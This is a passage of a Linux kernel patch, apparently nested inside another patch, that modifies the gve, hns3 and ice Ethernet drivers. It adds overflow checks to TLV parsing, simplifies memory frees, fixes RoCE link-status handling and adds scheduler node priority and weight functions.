+ 	tcp = tcp_hdr(skb);
+-
+-	/* Remove payload length from checksum. */
+ 	paylen = skb->len - skb_transport_offset(skb);
+-
+-	switch (skb_shinfo(skb)->gso_type) {
+-	case SKB_GSO_TCPV4:
+-	case SKB_GSO_TCPV6:
+-		csum_replace_by_diff(&tcp->check,
+-				     (__force __wsum)htonl(paylen));
+-
+-		/* Compute length of segmentation header. */
+-		header_len = skb_tcp_all_headers(skb);
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
++	csum_replace_by_diff(&tcp->check, (__force __wsum)htonl(paylen));
++	header_len = skb_tcp_all_headers(skb);
+ 
+ 	if (unlikely(header_len > GVE_TX_MAX_HDR_SIZE_DQO))
+ 		return -EINVAL;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 78d6752fe0519..4ce43c3a00a37 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -3538,6 +3538,9 @@ static int hns3_alloc_ring_buffers(struct hns3_enet_ring *ring)
+ 		ret = hns3_alloc_and_attach_buffer(ring, i);
+ 		if (ret)
+ 			goto out_buffer_fail;
++
++		if (!(i % HNS3_RESCHED_BD_NUM))
++			cond_resched();
+ 	}
+ 
+ 	return 0;
+@@ -5111,6 +5114,7 @@ int hns3_init_all_ring(struct hns3_nic_priv *priv)
+ 		}
+ 
+ 		u64_stats_init(&priv->ring[i].syncp);
++		cond_resched();
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h
+index 294a14b4fdefb..1aac93f9aaa15 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.h
+@@ -214,6 +214,8 @@ enum hns3_nic_state {
+ #define HNS3_CQ_MODE_EQE			1U
+ #define HNS3_CQ_MODE_CQE			0U
+ 
++#define HNS3_RESCHED_BD_NUM			1024
++
+ enum hns3_pkt_l2t_type {
+ 	HNS3_L2_TYPE_UNICAST,
+ 	HNS3_L2_TYPE_MULTICAST,
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index a2655adc764cd..01e24b69e9203 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -3129,9 +3129,7 @@ static void hclge_push_link_status(struct hclge_dev *hdev)
+ 
+ static void hclge_update_link_status(struct hclge_dev *hdev)
+ {
+-	struct hnae3_handle *rhandle = &hdev->vport[0].roce;
+ 	struct hnae3_handle *handle = &hdev->vport[0].nic;
+-	struct hnae3_client *rclient = hdev->roce_client;
+ 	struct hnae3_client *client = hdev->nic_client;
+ 	int state;
+ 	int ret;
+@@ -3155,8 +3153,15 @@ static void hclge_update_link_status(struct hclge_dev *hdev)
+ 
+ 		client->ops->link_status_change(handle, state);
+ 		hclge_config_mac_tnl_int(hdev, state);
+-		if (rclient && rclient->ops->link_status_change)
+-			rclient->ops->link_status_change(rhandle, state);
++
++		if (test_bit(HCLGE_STATE_ROCE_REGISTERED, &hdev->state)) {
++			struct hnae3_handle *rhandle = &hdev->vport[0].roce;
++			struct hnae3_client *rclient = hdev->roce_client;
++
++			if (rclient && rclient->ops->link_status_change)
++				rclient->ops->link_status_change(rhandle,
++								 state);
++		}
+ 
+ 		hclge_push_link_status(hdev);
+ 	}
+@@ -11339,6 +11344,12 @@ static int hclge_init_client_instance(struct hnae3_client *client,
+ 	return ret;
+ }
+ 
++static bool hclge_uninit_need_wait(struct hclge_dev *hdev)
++{
++	return test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state) ||
++	       test_bit(HCLGE_STATE_LINK_UPDATING, &hdev->state);
++}
++
+ static void hclge_uninit_client_instance(struct hnae3_client *client,
+ 					 struct hnae3_ae_dev *ae_dev)
+ {
+@@ -11347,7 +11358,7 @@ static void hclge_uninit_client_instance(struct hnae3_client *client,
+ 
+ 	if (hdev->roce_client) {
+ 		clear_bit(HCLGE_STATE_ROCE_REGISTERED, &hdev->state);
+-		while (test_bit(HCLGE_STATE_RST_HANDLING, &hdev->state))
++		while (hclge_uninit_need_wait(hdev))
+ 			msleep(HCLGE_WAIT_RESET_DONE);
+ 
+ 		hdev->roce_client->ops->uninit_instance(&vport->roce, 0);
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index f2be383d97df5..6d75e5638f665 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -388,7 +388,6 @@ struct ice_vsi {
+ 	struct ice_tc_cfg tc_cfg;
+ 	struct bpf_prog *xdp_prog;
+ 	struct ice_tx_ring **xdp_rings;	 /* XDP ring array */
+-	unsigned long *af_xdp_zc_qps;	 /* tracks AF_XDP ZC enabled qps */
+ 	u16 num_xdp_txq;		 /* Used XDP queues */
+ 	u8 xdp_mapping_mode;		 /* ICE_MAP_MODE_[CONTIG|SCATTER] */
+ 
+@@ -688,6 +687,25 @@ static inline void ice_set_ring_xdp(struct ice_tx_ring *ring)
+ 	ring->flags |= ICE_TX_FLAGS_RING_XDP;
+ }
+ 
++/**
++ * ice_get_xp_from_qid - get ZC XSK buffer pool bound to a queue ID
++ * @vsi: pointer to VSI
++ * @qid: index of a queue to look at XSK buff pool presence
++ *
++ * Return: A pointer to xsk_buff_pool structure if there is a buffer pool
++ * attached and configured as zero-copy, NULL otherwise.
++ */
++static inline struct xsk_buff_pool *ice_get_xp_from_qid(struct ice_vsi *vsi,
++							u16 qid)
++{
++	struct xsk_buff_pool *pool = xsk_get_pool_from_qid(vsi->netdev, qid);
++
++	if (!ice_is_xdp_ena_vsi(vsi))
++		return NULL;
++
++	return (pool && pool->dev) ? pool : NULL;
++}
++
+ /**
+  * ice_xsk_pool - get XSK buffer pool bound to a ring
+  * @ring: Rx ring to use
+@@ -700,10 +718,7 @@ static inline struct xsk_buff_pool *ice_xsk_pool(struct ice_rx_ring *ring)
+ 	struct ice_vsi *vsi = ring->vsi;
+ 	u16 qid = ring->q_index;
+ 
+-	if (!ice_is_xdp_ena_vsi(vsi) || !test_bit(qid, vsi->af_xdp_zc_qps))
+-		return NULL;
+-
+-	return xsk_get_pool_from_qid(vsi->netdev, qid);
++	return ice_get_xp_from_qid(vsi, qid);
+ }
+ 
+ /**
+@@ -728,12 +743,7 @@ static inline void ice_tx_xsk_pool(struct ice_vsi *vsi, u16 qid)
+ 	if (!ring)
+ 		return;
+ 
+-	if (!ice_is_xdp_ena_vsi(vsi) || !test_bit(qid, vsi->af_xdp_zc_qps)) {
+-		ring->xsk_pool = NULL;
+-		return;
+-	}
+-
+-	ring->xsk_pool = xsk_get_pool_from_qid(vsi->netdev, qid);
++	ring->xsk_pool = ice_get_xp_from_qid(vsi, qid);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+index fe48164dce1e1..4d53c40a9de27 100644
+--- a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
++++ b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+@@ -848,9 +848,9 @@ struct ice_aqc_txsched_elem {
+ 	u8 generic;
+ #define ICE_AQC_ELEM_GENERIC_MODE_M		0x1
+ #define ICE_AQC_ELEM_GENERIC_PRIO_S		0x1
+-#define ICE_AQC_ELEM_GENERIC_PRIO_M	(0x7 << ICE_AQC_ELEM_GENERIC_PRIO_S)
++#define ICE_AQC_ELEM_GENERIC_PRIO_M	        GENMASK(3, 1)
+ #define ICE_AQC_ELEM_GENERIC_SP_S		0x4
+-#define ICE_AQC_ELEM_GENERIC_SP_M	(0x1 << ICE_AQC_ELEM_GENERIC_SP_S)
++#define ICE_AQC_ELEM_GENERIC_SP_M	        GENMASK(4, 4)
+ #define ICE_AQC_ELEM_GENERIC_ADJUST_VAL_S	0x5
+ #define ICE_AQC_ELEM_GENERIC_ADJUST_VAL_M	\
+ 	(0x3 << ICE_AQC_ELEM_GENERIC_ADJUST_VAL_S)
+diff --git a/drivers/net/ethernet/intel/ice/ice_common.c b/drivers/net/ethernet/intel/ice/ice_common.c
+index 039342a0ed15a..419052ebc3ae7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_common.c
++++ b/drivers/net/ethernet/intel/ice/ice_common.c
+@@ -789,8 +789,7 @@ static void ice_cleanup_fltr_mgmt_struct(struct ice_hw *hw)
+ 				devm_kfree(ice_hw_to_dev(hw), lst_itr);
+ 			}
+ 		}
+-		if (recps[i].root_buf)
+-			devm_kfree(ice_hw_to_dev(hw), recps[i].root_buf);
++		devm_kfree(ice_hw_to_dev(hw), recps[i].root_buf);
+ 	}
+ 	ice_rm_all_sw_replay_rule_info(hw);
+ 	devm_kfree(ice_hw_to_dev(hw), sw->recp_list);
+@@ -986,8 +985,7 @@ static int ice_cfg_fw_log(struct ice_hw *hw, bool enable)
+ 	}
+ 
+ out:
+-	if (data)
+-		devm_kfree(ice_hw_to_dev(hw), data);
++	devm_kfree(ice_hw_to_dev(hw), data);
+ 
+ 	return status;
+ }
+@@ -1105,6 +1103,9 @@ int ice_init_hw(struct ice_hw *hw)
+ 
+ 	hw->evb_veb = true;
+ 
++	/* init xarray for identifying scheduling nodes uniquely */
++	xa_init_flags(&hw->port_info->sched_node_ids, XA_FLAGS_ALLOC);
++
+ 	/* Query the allocated resources for Tx scheduler */
+ 	status = ice_sched_query_res_alloc(hw);
+ 	if (status) {
+diff --git a/drivers/net/ethernet/intel/ice/ice_controlq.c b/drivers/net/ethernet/intel/ice/ice_controlq.c
+index 6bcfee2959915..f68df8e05b18e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_controlq.c
++++ b/drivers/net/ethernet/intel/ice/ice_controlq.c
+@@ -339,8 +339,7 @@ do {									\
+ 		}							\
+ 	}								\
+ 	/* free the buffer info list */					\
+-	if ((qi)->ring.cmd_buf)						\
+-		devm_kfree(ice_hw_to_dev(hw), (qi)->ring.cmd_buf);	\
++	devm_kfree(ice_hw_to_dev(hw), (qi)->ring.cmd_buf);		\
+ 	/* free DMA head */						\
+ 	devm_kfree(ice_hw_to_dev(hw), (qi)->ring.dma_head);		\
+ } while (0)
+diff --git a/drivers/net/ethernet/intel/ice/ice_flow.c b/drivers/net/ethernet/intel/ice/ice_flow.c
+index ef103e47a8dc2..85cca572c22a5 100644
+--- a/drivers/net/ethernet/intel/ice/ice_flow.c
++++ b/drivers/net/ethernet/intel/ice/ice_flow.c
+@@ -1303,23 +1303,6 @@ ice_flow_find_prof_id(struct ice_hw *hw, enum ice_block blk, u64 prof_id)
+ 	return NULL;
+ }
+ 
+-/**
+- * ice_dealloc_flow_entry - Deallocate flow entry memory
+- * @hw: pointer to the HW struct
+- * @entry: flow entry to be removed
+- */
+-static void
+-ice_dealloc_flow_entry(struct ice_hw *hw, struct ice_flow_entry *entry)
+-{
+-	if (!entry)
+-		return;
+-
+-	if (entry->entry)
+-		devm_kfree(ice_hw_to_dev(hw), entry->entry);
+-
+-	devm_kfree(ice_hw_to_dev(hw), entry);
+-}
+-
+ /**
+  * ice_flow_rem_entry_sync - Remove a flow entry
+  * @hw: pointer to the HW struct
+@@ -1335,7 +1318,8 @@ ice_flow_rem_entry_sync(struct ice_hw *hw, enum ice_block __always_unused blk,
+ 
+ 	list_del(&entry->l_entry);
+ 
+-	ice_dealloc_flow_entry(hw, entry);
++	devm_kfree(ice_hw_to_dev(hw), entry->entry);
++	devm_kfree(ice_hw_to_dev(hw), entry);
+ 
+ 	return 0;
+ }
+@@ -1662,8 +1646,7 @@ ice_flow_add_entry(struct ice_hw *hw, enum ice_block blk, u64 prof_id,
+ 
+ out:
+ 	if (status && e) {
+-		if (e->entry)
+-			devm_kfree(ice_hw_to_dev(hw), e->entry);
++		devm_kfree(ice_hw_to_dev(hw), e->entry);
+ 		devm_kfree(ice_hw_to_dev(hw), e);
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index cc6c04a69b285..7661e735d0992 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -117,14 +117,8 @@ static int ice_vsi_alloc_arrays(struct ice_vsi *vsi)
+ 	if (!vsi->q_vectors)
+ 		goto err_vectors;
+ 
+-	vsi->af_xdp_zc_qps = bitmap_zalloc(max_t(int, vsi->alloc_txq, vsi->alloc_rxq), GFP_KERNEL);
+-	if (!vsi->af_xdp_zc_qps)
+-		goto err_zc_qps;
+-
+ 	return 0;
+ 
+-err_zc_qps:
+-	devm_kfree(dev, vsi->q_vectors);
+ err_vectors:
+ 	devm_kfree(dev, vsi->rxq_map);
+ err_rxq_map:
+@@ -320,31 +314,17 @@ static void ice_vsi_free_arrays(struct ice_vsi *vsi)
+ 
+ 	dev = ice_pf_to_dev(pf);
+ 
+-	if (vsi->af_xdp_zc_qps) {
+-		bitmap_free(vsi->af_xdp_zc_qps);
+-		vsi->af_xdp_zc_qps = NULL;
+-	}
+ 	/* free the ring and vector containers */
+-	if (vsi->q_vectors) {
+-		devm_kfree(dev, vsi->q_vectors);
+-		vsi->q_vectors = NULL;
+-	}
+-	if (vsi->tx_rings) {
+-		devm_kfree(dev, vsi->tx_rings);
+-		vsi->tx_rings = NULL;
+-	}
+-	if (vsi->rx_rings) {
+-		devm_kfree(dev, vsi->rx_rings);
+-		vsi->rx_rings = NULL;
+-	}
+-	if (vsi->txq_map) {
+-		devm_kfree(dev, vsi->txq_map);
+-		vsi->txq_map = NULL;
+-	}
+-	if (vsi->rxq_map) {
+-		devm_kfree(dev, vsi->rxq_map);
+-		vsi->rxq_map = NULL;
+-	}
++	devm_kfree(dev, vsi->q_vectors);
++	vsi->q_vectors = NULL;
++	devm_kfree(dev, vsi->tx_rings);
++	vsi->tx_rings = NULL;
++	devm_kfree(dev, vsi->rx_rings);
++	vsi->rx_rings = NULL;
++	devm_kfree(dev, vsi->txq_map);
++	vsi->txq_map = NULL;
++	devm_kfree(dev, vsi->rxq_map);
++	vsi->rxq_map = NULL;
+ }
+ 
+ /**
+@@ -787,10 +767,8 @@ static void ice_rss_clean(struct ice_vsi *vsi)
+ 
+ 	dev = ice_pf_to_dev(pf);
+ 
+-	if (vsi->rss_hkey_user)
+-		devm_kfree(dev, vsi->rss_hkey_user);
+-	if (vsi->rss_lut_user)
+-		devm_kfree(dev, vsi->rss_lut_user);
++	devm_kfree(dev, vsi->rss_hkey_user);
++	devm_kfree(dev, vsi->rss_lut_user);
+ 
+ 	ice_vsi_clean_rss_flow_fld(vsi);
+ 	/* remove RSS replay list */
+diff --git a/drivers/net/ethernet/intel/ice/ice_nvm.c b/drivers/net/ethernet/intel/ice/ice_nvm.c
+index c262dc886e6a6..07ef6b1f00884 100644
+--- a/drivers/net/ethernet/intel/ice/ice_nvm.c
++++ b/drivers/net/ethernet/intel/ice/ice_nvm.c
+@@ -441,8 +441,7 @@ int
+ ice_get_pfa_module_tlv(struct ice_hw *hw, u16 *module_tlv, u16 *module_tlv_len,
+ 		       u16 module_type)
+ {
+-	u16 pfa_len, pfa_ptr;
+-	u16 next_tlv;
++	u16 pfa_len, pfa_ptr, next_tlv, max_tlv;
+ 	int status;
+ 
+ 	status = ice_read_sr_word(hw, ICE_SR_PFA_PTR, &pfa_ptr);
+@@ -455,11 +454,23 @@ ice_get_pfa_module_tlv(struct ice_hw *hw, u16 *module_tlv, u16 *module_tlv_len,
+ 		ice_debug(hw, ICE_DBG_INIT, "Failed to read PFA length.\n");
+ 		return status;
+ 	}
++
++	/* The Preserved Fields Area contains a sequence of Type-Length-Value
++	 * structures which define its contents. The PFA length includes all
++	 * of the TLVs, plus the initial length word itself, *and* one final
++	 * word at the end after all of the TLVs.
++	 */
++	if (check_add_overflow(pfa_ptr, pfa_len - 1, &max_tlv)) {
++		dev_warn(ice_hw_to_dev(hw), "PFA starts at offset %u. PFA length of %u caused 16-bit arithmetic overflow.\n",
++			 pfa_ptr, pfa_len);
++		return -EINVAL;
++	}
++
+ 	/* Starting with first TLV after PFA length, iterate through the list
+ 	 * of TLVs to find the requested one.
+ 	 */
+ 	next_tlv = pfa_ptr + 1;
+-	while (next_tlv < pfa_ptr + pfa_len) {
++	while (next_tlv < max_tlv) {
+ 		u16 tlv_sub_module_type;
+ 		u16 tlv_len;
+ 
+@@ -483,10 +494,13 @@ ice_get_pfa_module_tlv(struct ice_hw *hw, u16 *module_tlv, u16 *module_tlv_len,
+ 			}
+ 			return -EINVAL;
+ 		}
+-		/* Check next TLV, i.e. current TLV pointer + length + 2 words
+-		 * (for current TLV's type and length)
+-		 */
+-		next_tlv = next_tlv + tlv_len + 2;
++
++		if (check_add_overflow(next_tlv, 2, &next_tlv) ||
++		    check_add_overflow(next_tlv, tlv_len, &next_tlv)) {
++			dev_warn(ice_hw_to_dev(hw), "TLV of type %u and length 0x%04x caused 16-bit arithmetic overflow. The PFA starts at 0x%04x and has length of 0x%04x\n",
++				 tlv_sub_module_type, tlv_len, pfa_ptr, pfa_len);
++			return -EINVAL;
++		}
+ 	}
+ 	/* Module does not exist */
+ 	return -ENOENT;
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.c b/drivers/net/ethernet/intel/ice/ice_sched.c
+index 2c62c1763ee0d..849b6c7f0506b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.c
++++ b/drivers/net/ethernet/intel/ice/ice_sched.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /* Copyright (c) 2018, Intel Corporation. */
+ 
++#include <net/devlink.h>
+ #include "ice_sched.h"
+ 
+ /**
+@@ -352,9 +353,9 @@ void ice_free_sched_node(struct ice_port_info *pi, struct ice_sched_node *node)
+ 				node->sibling;
+ 	}
+ 
+-	/* leaf nodes have no children */
+-	if (node->children)
+-		devm_kfree(ice_hw_to_dev(hw), node->children);
++	devm_kfree(ice_hw_to_dev(hw), node->children);
++	kfree(node->name);
++	xa_erase(&pi->sched_node_ids, node->id);
+ 	devm_kfree(ice_hw_to_dev(hw), node);
+ }
+ 
+@@ -850,10 +851,8 @@ void ice_sched_cleanup_all(struct ice_hw *hw)
+ 	if (!hw)
+ 		return;
+ 
+-	if (hw->layer_info) {
+-		devm_kfree(ice_hw_to_dev(hw), hw->layer_info);
+-		hw->layer_info = NULL;
+-	}
++	devm_kfree(ice_hw_to_dev(hw), hw->layer_info);
++	hw->layer_info = NULL;
+ 
+ 	ice_sched_clear_port(hw->port_info);
+ 
+@@ -875,7 +874,7 @@ void ice_sched_cleanup_all(struct ice_hw *hw)
+  *
+  * This function add nodes to HW as well as to SW DB for a given layer
+  */
+-static int
++int
+ ice_sched_add_elems(struct ice_port_info *pi, struct ice_sched_node *tc_node,
+ 		    struct ice_sched_node *parent, u8 layer, u16 num_nodes,
+ 		    u16 *num_nodes_added, u32 *first_node_teid)
+@@ -940,6 +939,22 @@ ice_sched_add_elems(struct ice_port_info *pi, struct ice_sched_node *tc_node,
+ 
+ 		new_node->sibling = NULL;
+ 		new_node->tc_num = tc_node->tc_num;
++		new_node->tx_weight = ICE_SCHED_DFLT_BW_WT;
++		new_node->tx_share = ICE_SCHED_DFLT_BW;
++		new_node->tx_max = ICE_SCHED_DFLT_BW;
++		new_node->name = kzalloc(SCHED_NODE_NAME_MAX_LEN, GFP_KERNEL);
++		if (!new_node->name)
++			return -ENOMEM;
++
++		status = xa_alloc(&pi->sched_node_ids, &new_node->id, NULL, XA_LIMIT(0, UINT_MAX),
++				  GFP_KERNEL);
++		if (status) {
++			ice_debug(hw, ICE_DBG_SCHED, "xa_alloc failed for sched node status =%d\n",
++				  status);
++			break;
++		}
++
++		snprintf(new_node->name, SCHED_NODE_NAME_MAX_LEN, "node_%u", new_node->id);
+ 
+ 		/* add it to previous node sibling pointer */
+ 		/* Note: siblings are not linked across branches */
+@@ -2154,7 +2169,7 @@ ice_sched_get_free_vsi_parent(struct ice_hw *hw, struct ice_sched_node *node,
+  * This function removes the child from the old parent and adds it to a new
+  * parent
+  */
+-static void
++void
+ ice_sched_update_parent(struct ice_sched_node *new_parent,
+ 			struct ice_sched_node *node)
+ {
+@@ -2188,7 +2203,7 @@ ice_sched_update_parent(struct ice_sched_node *new_parent,
+  *
+  * This function move the child nodes to a given parent.
+  */
+-static int
++int
+ ice_sched_move_nodes(struct ice_port_info *pi, struct ice_sched_node *parent,
+ 		     u16 num_items, u32 *list)
+ {
+@@ -3562,7 +3577,7 @@ ice_sched_set_eir_srl_excl(struct ice_port_info *pi,
+  * node's RL profile ID of type CIR, EIR, or SRL, and removes old profile
+  * ID from local database. The caller needs to hold scheduler lock.
+  */
+-static int
++int
+ ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
+ 		      enum ice_rl_type rl_type, u32 bw, u8 layer_num)
+ {
+@@ -3598,6 +3613,57 @@ ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
+ 				       ICE_AQC_RL_PROFILE_TYPE_M, old_id);
+ }
+ 
++/**
++ * ice_sched_set_node_priority - set node's priority
++ * @pi: port information structure
++ * @node: tree node
++ * @priority: number 0-7 representing priority among siblings
++ *
++ * This function sets priority of a node among it's siblings.
++ */
++int
++ice_sched_set_node_priority(struct ice_port_info *pi, struct ice_sched_node *node,
++			    u16 priority)
++{
++	struct ice_aqc_txsched_elem_data buf;
++	struct ice_aqc_txsched_elem *data;
++
++	buf = node->info;
++	data = &buf.data;
++
++	data->valid_sections |= ICE_AQC_ELEM_VALID_GENERIC;
++	data->generic |= FIELD_PREP(ICE_AQC_ELEM_GENERIC_PRIO_M, priority);
++
++	return ice_sched_update_elem(pi->hw, node, &buf);
++}
++
++/**
++ * ice_sched_set_node_weight - set node's weight
++ * @pi: port information structure
++ * @node: tree node
++ * @weight: number 1-200 representing weight for WFQ
++ *
++ * This function sets weight of the node for WFQ algorithm.
++ */
++int
++ice_sched_set_node_weight(struct ice_port_info *pi, struct ice_sched_node *node, u16 weight)
++{
++	struct ice_aqc_txsched_elem_data buf;
++	struct ice_aqc_txsched_elem *data;
++
++	buf = node->info;
++	data = &buf.data;
++
++	data->valid_sections = ICE_AQC_ELEM_VALID_CIR | ICE_AQC_ELEM_VALID_EIR |
++			       ICE_AQC_ELEM_VALID_GENERIC;
++	data->cir_bw.bw_alloc = cpu_to_le16(weight);
++	data->eir_bw.bw_alloc = cpu_to_le16(weight);
++
++	data->generic |= FIELD_PREP(ICE_AQC_ELEM_GENERIC_SP_M, 0x0);
++
++	return ice_sched_update_elem(pi->hw, node, &buf);
++}
++
+ /**
+  * ice_sched_set_node_bw_lmt - set node's BW limit
+  * @pi: port information structure
+@@ -3608,7 +3674,7 @@ ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
+  * It updates node's BW limit parameters like BW RL profile ID of type CIR,
+  * EIR, or SRL. The caller needs to hold scheduler lock.
+  */
+-static int
++int
+ ice_sched_set_node_bw_lmt(struct ice_port_info *pi, struct ice_sched_node *node,
+ 			  enum ice_rl_type rl_type, u32 bw)
+ {
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.h b/drivers/net/ethernet/intel/ice/ice_sched.h
+index 4f91577fed56b..920db43ed4fa6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.h
++++ b/drivers/net/ethernet/intel/ice/ice_sched.h
+@@ -6,6 +6,8 @@
+ 
+ #include "ice_common.h"
+ 
++#define SCHED_NODE_NAME_MAX_LEN 32
++
+ #define ICE_QGRP_LAYER_OFFSET	2
+ #define ICE_VSI_LAYER_OFFSET	4
+ #define ICE_AGG_LAYER_OFFSET	6
+@@ -69,6 +71,28 @@ int
+ ice_aq_query_sched_elems(struct ice_hw *hw, u16 elems_req,
+ 			 struct ice_aqc_txsched_elem_data *buf, u16 buf_size,
+ 			 u16 *elems_ret, struct ice_sq_cd *cd);
++
++int
++ice_sched_set_node_bw_lmt(struct ice_port_info *pi, struct ice_sched_node *node,
++			  enum ice_rl_type rl_type, u32 bw);
++
++int
++ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
++		      enum ice_rl_type rl_type, u32 bw, u8 layer_num);
++
++int
++ice_sched_add_elems(struct ice_port_info *pi, struct ice_sched_node *tc_node,
++		    struct ice_sched_node *parent, u8 layer, u16 num_nodes,
++		    u16 *num_nodes_added, u32 *first_node_teid);
++
++int
++ice_sched_move_nodes(struct ice_port_info *pi, struct ice_sched_node *parent,
++		     u16 num_items, u32 *list);
++
++int ice_sched_set_node_priority(struct ice_port_info *pi, struct ice_sched_node *node,
++				u16 priority);
++int ice_sched_set_node_weight(struct ice_port_info *pi, struct ice_sched_node *node, u16 weight);
++
+ int ice_sched_init_port(struct ice_port_info *pi);
+ int ice_sched_query_res_alloc(struct ice_hw *hw);
+ void ice_sched_get_psm_clk_freq(struct ice_hw *hw);
+@@ -82,6 +106,9 @@ ice_sched_find_node_by_teid(struct ice_sched_node *start_node, u32 teid);
+ int
+ ice_sched_add_node(struct ice_port_info *pi, u8 layer,
+ 		   struct ice_aqc_txsched_elem_data *info);
++void
++ice_sched_update_parent(struct ice_sched_node *new_parent,
++			struct ice_sched_node *node);
+ void ice_free_sched_node(struct ice_port_info *pi, struct ice_sched_node *node);
+ struct ice_sched_node *ice_sched_get_tc_node(struct ice_port_info *pi, u8 tc);
+ struct ice_sched_node *
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 46b36851af460..5ea6365872571 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1636,21 +1636,16 @@ ice_save_vsi_ctx(struct ice_hw *hw, u16 vsi_handle, struct ice_vsi_ctx *vsi)
+  */
+ static void ice_clear_vsi_q_ctx(struct ice_hw *hw, u16 vsi_handle)
+ {
+-	struct ice_vsi_ctx *vsi;
++	struct ice_vsi_ctx *vsi = ice_get_vsi_ctx(hw, vsi_handle);
+ 	u8 i;
+ 
+-	vsi = ice_get_vsi_ctx(hw, vsi_handle);
+ 	if (!vsi)
+ 		return;
+ 	ice_for_each_traffic_class(i) {
+-		if (vsi->lan_q_ctx[i]) {
+-			devm_kfree(ice_hw_to_dev(hw), vsi->lan_q_ctx[i]);
+-			vsi->lan_q_ctx[i] = NULL;
+-		}
+-		if (vsi->rdma_q_ctx[i]) {
+-			devm_kfree(ice_hw_to_dev(hw), vsi->rdma_q_ctx[i]);
+-			vsi->rdma_q_ctx[i] = NULL;
+-		}
++		devm_kfree(ice_hw_to_dev(hw), vsi->lan_q_ctx[i]);
++		vsi->lan_q_ctx[i] = NULL;
++		devm_kfree(ice_hw_to_dev(hw), vsi->rdma_q_ctx[i]);
++		vsi->rdma_q_ctx[i] = NULL;
+ 	}
+ }
+ 
+@@ -5525,9 +5520,7 @@ ice_add_adv_recipe(struct ice_hw *hw, struct ice_adv_lkup_elem *lkups,
+ 		devm_kfree(ice_hw_to_dev(hw), fvit);
+ 	}
+ 
+-	if (rm->root_buf)
+-		devm_kfree(ice_hw_to_dev(hw), rm->root_buf);
+-
++	devm_kfree(ice_hw_to_dev(hw), rm->root_buf);
+ 	kfree(rm);
+ 
+ err_free_lkup_exts:
+diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h
+index e1abfcee96dcd..daf86cf561bc7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_type.h
++++ b/drivers/net/ethernet/intel/ice/ice_type.h
+@@ -524,7 +524,14 @@ struct ice_sched_node {
+ 	struct ice_sched_node *sibling; /* next sibling in the same layer */
+ 	struct ice_sched_node **children;
+ 	struct ice_aqc_txsched_elem_data info;
++	char *name;
++	struct devlink_rate *rate_node;
++	u64 tx_max;
++	u64 tx_share;
+ 	u32 agg_id;			/* aggregator group ID */
++	u32 id;
++	u32 tx_priority;
++	u32 tx_weight;
+ 	u16 vsi_handle;
+ 	u8 in_use;			/* suspended or in use */
+ 	u8 tx_sched_layer;		/* Logical Layer (1-9) */
+@@ -706,6 +713,7 @@ struct ice_port_info {
+ 	/* List contain profile ID(s) and other params per layer */
+ 	struct list_head rl_prof_list[ICE_AQC_TOPO_MAX_LEVEL_NUM];
+ 	struct ice_qos_cfg qos_cfg;
++	struct xarray sched_node_ids;
+ 	u8 is_vf:1;
+ };
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 48cf24709fe32..b917f271cdac1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -281,7 +281,6 @@ static int ice_xsk_pool_disable(struct ice_vsi *vsi, u16 qid)
+ 	if (!pool)
+ 		return -EINVAL;
+ 
+-	clear_bit(qid, vsi->af_xdp_zc_qps);
+ 	xsk_pool_dma_unmap(pool, ICE_RX_DMA_ATTR);
+ 
+ 	return 0;
+@@ -312,8 +311,6 @@ ice_xsk_pool_enable(struct ice_vsi *vsi, struct xsk_buff_pool *pool, u16 qid)
+ 	if (err)
+ 		return err;
+ 
+-	set_bit(qid, vsi->af_xdp_zc_qps);
+-
+ 	return 0;
+ }
+ 
